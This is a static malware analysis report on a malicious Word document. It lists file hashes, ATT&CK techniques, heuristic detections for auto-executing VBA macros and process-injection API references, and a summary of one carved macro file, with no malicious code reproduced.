Malicious Office (OLE) / .DOCX — malware analysis report

Static analysis result for SHA-256 2c0701ffcbca2fa3…

MALICIOUS

Office (OLE) / .DOCX

43.0 KB Created: 2020-08-12 14:01:00 Authoring application: Microsoft Office Word
MD5: c9a91021c6acc6efcc7e1a9958babb41 SHA-1: 98191440975f85d8d29f286f835b1cf3484e6206 SHA-256: 2c0701ffcbca2fa3d1db55864e016bf3a0ac3cfeb6721d8d78edc1067748b03e
428 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1059.003 Windows Command Shell T1204.002 Malicious File T1105 Ingress Tool Transfer T1055.012 Process Hollowing

The sample contains VBA macros, including AutoOpen and Workbook_Open, which are designed to execute automatically when the document is opened. Heuristics indicate the use of APIs like CreateProcess, VirtualAlloc, WriteProcessMemory, and CreateRemoteThread, suggesting the macros are likely used to download and execute a second-stage payload. The ClamAV detection and general heuristic firings strongly indicate malicious intent.

Heuristics 12

  • Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORY
    Reference to WriteProcessMemory API
  • Reference to CreateRemoteThread API critical SC_STR_CREATEREMOTETHREAD
    Reference to CreateRemoteThread API
  • ClamAV: Doc.Malware.Valyria-10012625-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-10012625-0
  • Reference to CreateProcess API high SC_STR_CREATEPROCESS
    Reference to CreateProcess API
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
a81d6593ce9c9844f3db4dcacef2c6454f43171f5640d7fa5cfecc4cbf2502b0		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 7871 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 shell/COM execution token(s). Carved macro source contains an auto-exec entry point and execution/download terms.

Open this report in the interactive analyzer, or submit your own file for analysis.